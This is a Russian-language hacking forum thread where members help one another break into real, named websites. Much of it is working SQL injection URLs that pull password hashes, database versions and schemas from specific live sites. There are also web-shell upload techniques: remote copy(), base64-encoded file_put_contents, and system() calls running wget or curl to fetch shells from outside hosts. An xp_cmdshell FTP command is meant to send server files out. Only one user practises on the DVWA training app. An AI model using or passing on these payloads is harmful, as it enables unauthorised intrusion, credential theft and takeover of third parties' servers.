email='&passone=1&passtwo=1&lastname=1&firstname=1&midname=1&keeper=1&Submit=1

Результат работы

тнера





Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cdmag/data/www/dvdshka.ru/partners/partners_ufunctions.php on line 264


Адрес электронной почты не может быть без символа "@"
Вы не указали адреса своих сайтов
Вы не правильно указали WMR кош



______________________________________________

Каким образом выполнить SQL инъекция по методу post исходя из текущих данных?

Сайт на Joomle. Как определить её версию?

exzi11 said:
Сайт на Joomle. Как определить её версию?


http://site.com/configuration.php-dist

или в исходниках админки:

http://www.site.com/administrator/

Вот вопросег... есть юзер mssql (2008 r2), с xp_cmdshell. Хочу зааплоудить файлики с харда серва на фтп. Делаю так со своей машины :

Start run cmd ->


Code:
ftp -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR

Всё канает - фтп выполняет содержимое cmd.txt после подключения к ftp. Но вот если делать так :


Code:
exec xp_cmdshell 'c:\windows\system32\ftp.exe -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR'

- канать не хочет. Пишет


Code:
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
NULL
Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.
.............................

Подскажите, что может быть не так ? )

Движок webasyst

Посмотрел видео: http://www.youtube.com/watch?v=DgXCGzRLvYY

Дохожу до момента Duplicate entry for key group с помощью


- index.php?ukey=news&blog_id=(select+1+from+(select+count(0),concat((se lect+version()),floor(rand(0)*2))+from+SC_news_tab le+group+by+2+limit+1)a)--+


Как дальше выдрать хешы?

Колонки

U_ID

U_PASSWORD

ну так вместо вывода версии (select+version()) пиши свой запрос, типа


Code:
select concat_ws(0x3a,u_id,u_password) from имя_таблицы_в_которой_пасс limit 0,1

очевидно же

не смог зделать сам по этому прошу помощь >.

Такой вопрос,


http://britishcat.ru/articlees5314+union+select+1,2,3,4.html


Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)

qaz said:
Такой вопрос,
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)



Скуля однозначно


Code:
http://britishcat.ru/articlees5354/**/and/**/1=1.html TRUE

http://britishcat.ru/articlees5354/**/and/**/1=2.html FALSE

http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html

Крути как слепую


Code:
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html TRUE

http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html FALSE

qaz said:
Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок

Code:
Цhttp://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'




Ничё интересного там нет... Прав на запись тоже...


Code:
FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0:
1004 ( apache ) Group: 1003 ( apache )
5.2.17
Safe mode: OFF
/home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x

Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?

h.elg said:
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?


если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть

BigBear через фото галерею шелл запилил?

Iggy said:
BigBear
через фото галерею шелл запилил?


нет, не через фотогалерею.

Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.

Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки :

http://i30.fastpic.ru/thumb/2012/0127/98/d557a40d4799a2528c903e1bb4a02298.jpeg (http://fastpic.ru/view/30/2012/0127/d557a40d4799a2528c903e1bb4a02298.jpg.html)

Если я пишу любое слово после page= то показывает ошибки :

http://i31.fastpic.ru/thumb/2012/0127/e8/6faf59b952257add4f2d6b8d9e43e5e8.jpeg (http://fastpic.ru/view/31/2012/0127/6faf59b952257add4f2d6b8d9e43e5e8.jpg.html)

Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?

Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )

Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.

Спасибо.

Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...

NZT said:
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки
http://i30.fastpic.ru/thumb/2012/0127/98/d557a40d4799a2528c903e1bb4a02298.jpeg (http://fastpic.ru/view/30/2012/0127/d557a40d4799a2528c903e1bb4a02298.jpg.html)
Если я пишу любое слово после page= то показывает ошибки
http://i31.fastpic.ru/thumb/2012/0127/e8/6faf59b952257add4f2d6b8d9e43e5e8.jpeg (http://fastpic.ru/view/31/2012/0127/6faf59b952257add4f2d6b8d9e43e5e8.jpg.html)
Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо.


подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?

Faaax said:
подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?


Там и дураку должно быть понятно, что в данном случае allow_url_include=0, а нужен allow_url_include=1

Boolean said:
Там и дураку должно быть понятно, что в данном случае allow_url_include=0, а нужен allow_url_include=1


У меня в .htaccess записано #php_flag allow_url_include on , ведь так должно быть ? А не работает . Даже не знаю что делать (

Делал и так :


HTML:
+Q. SQL Injection wont work on PHP version 5.2.6.

-A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work.

In .htaccess:

Replace:


php_flag magic_quotes_gpc off
#php_flag allow_url_fopen on
#php_flag allow_url_include on


With:


magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On


Тоже не помогает.

NZT said:



а что дальше происходит с $file? или это весь код?

Чакэ said:
а что дальше происходит с $file? или это весь код?


Это весь код , и этот код лежит в папке fi/source/low.php а просто в папке fi лежит index.php и в нем длиный скрипт и внизу написано include($file); , может одно дополняет другое, я в php не очень силен )

В Mutillidae у меня таже фигня не хочет открываться шелл. Я наверное что то не так сделал но не могу понять что.

Если кому не лень скачать себе DVWA и проверить если у него таже фигня ? )

NZT said:
У меня в .htaccess записано #php_flag allow_url_include on , ведь так должно быть ? А не работает . Даже не знаю что делать (
Делал и так :

HTML:
+Q. SQL Injection wont work on PHP version 5.2.6.

-A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work.

In .htaccess:

Replace:


php_flag magic_quotes_gpc off
#php_flag allow_url_fopen on
#php_flag allow_url_include on


With:


magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On


Тоже не помогает.


# перед строкой означает начало комментария, то есть твои два правила не действуют. не всегда срабатывает включение в .htaccess и нужно править основной php.ini сервера.

в php.ini записано allow_url_include on.

У меня в двух сайтах для тренировок не получается.

Наверное я что то не так делаю, может сервер на котором у меня шелл не тот ? сервер - holm.ru

Но там же ничего сложного нет просто после = пишешь адресс к шеллу без расширения и все?

Если я пишу mysite.ru/shell.php то шелл открывается , значит шелл нормальный.

Я все делаю как я описал выше, в чем может быть проблема? Мне вместо шелла выдаются ошибки. Кто то у себя на DVWA пробовал ? работает?

тот php.ini что в папке у тебя не действует из-за того что у «главного» php.ini эти флаги стоят в off, а для вебсервера «главный» приоритетней твоего. это лишь моя теория, может быть дело совсем в другом..

Думаю ты прав потому что в файле php про который я говорил не написано после php точка ini и тип у него "парметры конфигурации" и в нем записано ; This file attempts to overwrite the original php.ini file. Doesnt always work. Дело в том что я не нашел другого php.ini , как я посмотрел там его просто нет. Не подскажешь случайно где его найти или надо свой создать? И если создавать то что в него вписать надо?

Извеняюсь за столько вопросов , если засоряю тему , просто очень хочеться чтобы у меня получилась php injection. Спасибо за ответы.

Чакэ, вообще должно быть наоборот) иначе просто незачем было бы вводить эти дериктивы в .htaccess если php.ini все равно делает по своему.

NZT, у тебя не получается просто потому что ты делаешь не правильно. Ты пытаешься заинклудить http://msp.hut4.ru/r57shell а его у тебя на хостинге нет, даже если будешь вводить http://msp.hut4.ru/r57shell.php то тоже ничего не получится, ибо отдать тебе будет не сам php код шела а уже сгенерированный html. Тут выше уже писали, http://msp.hut4.ru/r57shell.txt должен прокатить, только предварительно залей этот файл.

C .txt? тоже ничего не получается. Я залил shell.php и shell.txt в папку www, туда их надо заливать? И почему shell.php не будет работать , вот зайди http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt , все работает , или то что мне показывает это сгенерированый html? Я скорее всего не правильно заливаю на сервер как ты говоришь. Я заливаю через total commander в папку www сайта. А как надо? И спасибо тебе за желание помочь.

C .txt? тоже ничего не получается. Я залил shell.php и shell.txt в папку www, туда их надо заливать? И почему shell.php не будет работать , вот зайди http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt , все работает , или то что мне показывает это сгенерированый html?


php на сервере интерпретируется (если там конечно есть поддержка php) , и отдает на уже ответ а не исходник самого шела, ты же когда инклудишь тебе нужен именно код, почитай http://php.su/functions/?include


Я скорее всего не правильно заливаю на сервер как ты говоришь. Я заливаю через total commander в папку www сайта. А как надо?


так и нужно, тогда нужно искать проблему с конфигурацией сервера, сервер после изменений в php.ini перезагружал ? В .htaccess коментарии поубирал как и говорилось выше ?

Вставлю и я свои 3 копейки

http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+SCHEMA_NAME+from+information_schema.SC HEMATA'

Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает.

Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так:

http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+CHAR(46)'

Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.

Brain_Enable said:
Вставлю и я свои 3 копейки
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+SCHEMA_NAME+from+information_schema.SC HEMATA'
Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает.
Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так:
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands
'
+union+select+CHAR(46)
'
Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.


текст ошибки лучше покажи.

trololoman96, ну да, ты прав в этом, но как там и написано


; This file attempts to overwrite the original php.ini file.
Doesnt always work
.

Чакэ said:
текст ошибки лучше покажи.


Когда пишу точку, говорит:

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19

Без точки нормально все получается, имею ввиду не конкретно этот запрос.

Brain_Enable said:
Когда пишу точку, говорит:
Warning
: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19
Без точки нормально все получается, имею ввиду не конкретно этот запрос.


это не на точку ругается. ты не туда смотришь..


HTML:
http://www.cmdhelp.ru/index.php?cmd='+union+select+concat_ws(0x3a,table_ schema,table_name,column_name)+from+information_sc hema.columns+where+table_schema!='information_sche ma'+limit+0,1--+

далее 44 раза инкрементишь цифру 0. ну ты понел.. и ещё кажется там lfi

Привет всем.

каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?

Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал

Почему названия столбцов разделяются двоеточием, а не запятой?

Вы сами пробовали этот код?

Киев said:
Привет всем.
каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?


Примерно таким:

$mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";

Тогда при вставке твоего кода получается:

$mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';

То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.

есть где почитать подробнее про заливку шела через картинку?

просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.

переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -

http://s004.radikal.ru/i206/1201/d3/24dc761002b2.png

жду советов

Justonline

Возможно ты залил картинку,посмотри firebug'ом или в исходном коде путь картинки и запускай шелл.

PS:Народ форум IPB,можно ли через attachments как нибудь залить шелл?Мне просто интересно,доступно прикрепление файлов всех форматов,а вот по ссылке предлагает скачать..как узнать где хранится прикрепленный файл на сервере форума именно в том формате какой я залил? Или это не работает?

Установить форум и проверить нет возможности,поэтому прошу знатоков)

Brain_Enable said:
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал
Почему названия столбцов разделяются двоеточием, а не запятой?
Вы сами пробовали этот код?


товарисч, иди кури маны. тоже мне хацкир..

justonline said:
есть где почитать подробнее про заливку шела через картинку?
просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.
переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -
http://s004.radikal.ru/i206/1201/d3/24dc761002b2.png
жду советов


/thread312513.html

В такой ситуации как залить шелл, или это безнадежно?

Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?

http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php

Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1

er9j6@ said:
В такой ситуации как залить шелл, или это безнадежно?
Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?
http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php
Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1


через file_put_contents залей форму upload а, дальше шелл..

Как заливать шеллы, используя плохую настройку .htaccess?

ReckouNT said:
Как заливать шеллы, используя плохую настройку .htaccess?


А по точнее? Например, если льеш файл .php, а он через скрипт ренеймится в 4341843438121354131_file.php, можно полистать папки


используя плохую настройку .htaccess


.

http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ? Просто параметр проходит через функцию int(), и поэтому результат не увидеть (

такой вопрос, в пхп инъекции:

Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd.str - это без нул байта

а вот это с нул байтом

Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd\0.str)

вопрос как еще можно отрезать "0.str"?

2bodrich,


Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat_ws(0x3a,user(),d atabase(),version()),3,4,5,6,7,8--+f



Code:
root@localhost:problems:5.1.49-3

Full Path:


Code:
/var/www/reshuege.ru/

Вообщем можно много чего вытащить ^_^ Походу папка /psprav/

доступна на запись.


bodrich said:
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ?
Просто параметр проходит через функцию int(), и поэтому результат не увидеть (


2pirat0,

4096 слешей пробуй.

UPD. Нет(

2Ereee не канает, еще может какие то мысли?

есть сайт с инъекцией. дальше вывода informaton.schemA не смог уйти.

тут светить не хочу, если кто помочь сможет - в личку пожалст.

Haviji и еще пару средств раскрутки скулей так же не смогли мне помочь

так что, думаю это мб только зелененьким позубам)

Ereee, спасибо ! И еще вопрос, список всех таблиц узнал


http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,group_concat(0x0b,table _name),3,4,5,6,7,8+from+information_schema.tables--+


А вот что либо вытянуть не получается, ошибка


http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,2,3,4,5,6,7,8+from+prof iles--+f

bodrich said:
Ereee
, спасибо ! И еще вопрос, список всех таблиц узнал
А вот что либо вытянуть не получается, ошибка


может profiles в другой бд. какое поле ты хочешь вытянуть если у тебя только список таблиц есть? сливать нужно не только table_name но и table_schema и column_name и всё это, естественно брать не из ..schema.tables, а из ..schema.columns

bodrich said:
Ereee
, спасибо ! И еще вопрос, список всех таблиц узнал
А вот что либо вытянуть не получается, ошибка


Вот так все выведет:


Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3 a,table_name,0x3a,column_name),3,4,5,6,7,8+from+in formation_schema.columns+where+table_schema!='info rmation_schema'--+

Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:

база:таблица:столбцы

Ereee said:
Вот так все выведет:

Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3 a,table_name,0x3a,column_name),3,4,5,6,7,8+from+in formation_schema.columns+where+table_schema!='info rmation_schema'--+

Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:
база:таблица:столбцы


concat_ws трушней. concat не выведет ничего если хоть одно поле null

есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?

Cherep said:
есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?


Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.

Ereee said:
Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.


вид вот такой

[CODE]
Code:
њ‡*XЌ>S:Nўn(°эYЫ"њФ–Qўg)}NJтj»•®" Ђ&r_пґШ^‹Х) Ь_VШGBФ^iџN:/AЬ?ЦШ!»qYCЉд

здрасте, вопрос такой, вот допустим раскрутил я скуля, нашол таблицу с users выдрал от туда запись с id=1, росшыфровал хеш, (при том что использовал запрос типа like '%pas%', выдало мне одну единственную таблицу, тоисть у других поля password нет, но потом я все же перебрал таблицы, действительно записи юзверей хранятся только в этой таблице) захожу в админку - меня не пускает(пробывал не только с id=1),как оказалось это таблица аворизации на самом сайте,тоисть клиенты, в чем может быть подвох? версия скуля 5.0.51a-24+lenny5, админка - CMS Terminator Engine, и где искать хеш админа??

2Cherep,

открой любой бинарный файл блокнотом, увидишь то же самое. Откуда файл?

2pirat0,

Хорошо было бы, если скульи выложишь в теме. Но возможно, что пасс админа хранится в файле, а это облом. В выводимый столбц вставь запрос:


Code:
(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x )

Там вид база:table:column. Найти что-то типа user_rights, user_permisson, admin_user и т.п. Удачи!

2Ereee,

я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?

pirat0 said:
2Ereee,
я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?


Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.

Есть выполнение php скрипта на сайте, как залить шелл?

http://www.site.com/index.php?s=10&id=phpinfo();

mq=on

base64_decode([]);

где [] — copy('http://site1.tu/shell.txt', './shell.php'); в base64

Ereee said:
Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.


так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.

а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)

pirat0 said:
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.
а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)


пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию

Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать?

Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки.

Кто что посоветует сделать?

Konqi said:
если нету таблиц значит они в другой базе


базы тоже проверял, только две - information_schema и текущяя


Konqi said:
если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию


где про это можно поподробнее прочитать??

pirat0 said:
базы тоже проверял, только две - information_schema и текущяя
где про это можно поподробнее прочитать??


о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль

Konqi said:
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль


command denied to user - file_priv нету

(читалка это я так понимаю из розряда LFI??)

pirat0 said:
command denied to user - file_priv нету
(читалка это я так понимаю из розряда LFI??)


или LFI с возможностю читать исходники с помощю php://filter, или читалка, file_get_contents, fopen, прочее

Пытаюсь создать файл со следующим содержимым

file_put_contents('lala.php', '');

http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEuc GhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);

mq=on

и поэтому адресу должен появиться файл

http://www.site.com/lala.php

но вместо этого:

404.

Запрошенный Вами документ отсутствует на сервере.

er9j6@ said:
Пытаюсь создать файл со следующим содержимым
file_put_contents('lala.php', '');
http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEuc GhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);
mq=on
и поэтому адресу должен появиться файл
http://www.site.com/lala.php
но вместо этого:
404.
Запрошенный Вами документ отсутствует на сервере.



ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда

base64_decode($_GET[a]);&a=твой_base64_код

Konqi said:
ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда
bas64_decode($_GET[a]);&a=твой_base64_код


Делаю

http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

и тут

http://www.site.com/lala.php

все равно выводит

404.

Запрошенный Вами документ отсутствует на сервере.

er9j6@ said:
Делаю
http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
и тут
http://www.site.com/lala.php
все равно выводит
404.
Запрошенный Вами документ отсутствует на сервере.


если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции

Konqi said:
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции


Konqi

какие другие функции можно еще использовать?

er9j6@ said:
Konqi
какие другие функции можно еще использовать?



можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть

пример

system($_GET[a]);&a=wget http://site.ru/shell.php

или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);

неоднакратно обсуждалось это тема

Konqi said:
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть
пример
system($_GET[a]);&a=wget http://site.ru/shell.php
или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);
неоднакратно обсуждалось это тема


у меня в шаблоне записан eval, его что нужно заменить sistem?

ipsclass->input['cid'] = 1">

ipsclass->input['id'])">

er9j6@ said:
у меня в шаблоне записан eval, его что нужно заменить sistem?
ipsclass->input['cid'] = 1">
ipsclass->input['id'])">



не надо ничем заменить, вместо file_put_contents, используйте те функции которые я написал

er9j6@ достаточно зафлудили в теме, листайте топик, уверен найдете все ответы на ваши вопросы

er9j6@,

у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.

Существуют ли аналоги Goolag Scanner?

И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.

x"]
Tr[1]x said:
Существуют ли аналоги Goolag Scanner?
И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.


http://madnet.name/tools/madss/ , не?

Ereee said:
er9j6@
,
у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.


В какой шаблон ты вписал этот код ? НЕ найду.

ipsclass->input['kod'] = 1">

ipsclass->input['pzdc'])">



Как я понимаю, ты нашел новый способ заливки шеллов в IPB

er9j6@ said:
В какой шаблон ты вписал этот код ? НЕ найду.
ipsclass->input['kod'] = 1">
ipsclass->input['pzdc'])">

Как я понимаю, ты нашел новый способ заливки шеллов в IPB


https://rdot.org/forum/showpost.php?p=7037&postcount=12

Привет %Username%, вопрос в следующем нащупал sql иньекцию, и все впринципе нормально, но есть пару но:

Вытащить могу данные только одного юзверя, если укажу его айди например:


Code:
xxxx.php?wid=1&pid=-1+union+select+password+from +users +where uid =506

получаю пароль: %pass%

Но когда составляю запрос, что бы получить список всех юзверей, например:


Code:
.php?wid=2&pid=-1+union+select+email+from +users + group + by + uid+ desc

На что мне выдает стринг с текстом : Array

Так же проблема выдать комбинированный запрос:


Code:
.php?wid=2&pid=-1+union+select+email,uid+from +users where uid = 808

В ответ The used SELECT statements have a different number of columns

Буду рад просвещению, с иньекциями раньше никогда толком не работал, но вот пришлось.

Задаю не в первый раз.

Вопрос насчет каким парсером пользуетесь, товарищи, для sql инъекции?.

Актуально

PS: sql poizon сломался, в гугл парсерах смысла не вижу, так как банит.

И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.


ну а как, пробуй все те же методы что и в админ панель.

http://www.forum.antichat.net/showthread.php?p=2935725

Spot, а что мешает через лимит спарсить?

или если массово, пробуй GROUP_CONCAT()

только тут ограничение на кол-во выводимых данных, по умлочанию — 1024


Так же проблема выдать комбинированный запрос:
union+select+email,uid+from +users where uid = 808


правильный синтаксис такой — concat_ws(0x3a,email,uid)

или concat

stan0009, попробуй Яшкалюб, а чекать на скули sqlndm

Подскажите какую-нибудь программу, похожую на Radmin, но чтобы она работала на ос FreeBSD.

faza02 said:
ну а как, пробуй все те же методы что и в админ
правильный синтаксис такой — concat_ws(0x3a,email,uid)
или concat
stan0009
, попробуй Яшкалюб, а чекать на скули sqlndm


тут concat_ws() не причем хотя очень полезная функция, тут uid надо задать в хексе или в кавычки если не экранируется,

вот пример:


.php?wid=2&pid=-1+union+select+email,uid+from +users+where+uid=0x383038




.php?wid=2&pid=-1+union+select+concat_ws(0x3a,email,uid),2+from +users+where+uid=0x383038

http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87

ребята прошу просто посмотреть есть ли тут инъекцыя??

Можно ли через эту информацию взломать или залить шелл


https://www.beadedpatterns.com/phpinfo.php

2pirat0,

не думаю.

2Gaben7,

если есть LFI, то можно залить шелл. А так, phpinfo(); дает представление, с чем ты имеешь дело. Узнаешь пути, отключенные функции и т.д.

http://s-zon.org/pricelists_good.php?PriceLists&id_pl=29&id_g=170&c1=-1

вроде php-injection? но чет подставляю страницы - не читает, почему так??

pirat0 said:
http://s-zon.org/pricelists_good.php?PriceLists&id_pl=29&id_g=170&c1=-1
вроде php-injection? но чет подставляю страницы - не читает, почему так??


Опять же не думаю, что там есть уязвимость. Возможно просто ошибка.

myadmin

Приветствую.

Как можно узнать версию phpmyadmin?

JorryGo said:
Приветствую.
Как можно узнать версию phpmyadmin?


http://сайт_нужный/phpmyadmin/ChangeLog

Ты это имел ввиду?

Народ, помогите скулю разкрутить,


http://biclopsgames.com/game.php?id=6


чтобы не ввёл ничего не меняется

qaz said:
Народ, помогите скулю разкрутить,
чтобы не ввёл ничего не меняется


http://biclopsgames.com/game.php?id=1+and+1=(select+1+from(select+count(*) ,concat(version(),floor(rand(0)*2))x+from+informat ion_schema.tables+group+by+x)a)--+

Нужна ваша помощь, имеется DLE сайт, версия 5.5, опробовал уже много способов заливки шелла, нечего не получилось. Опробовал добавление разрешение пхп, и хтчекс в конфиг, нечего не вышло и еще пару штук.

Если кто-то может помочь, буду рад

подскажите в чем пробл.

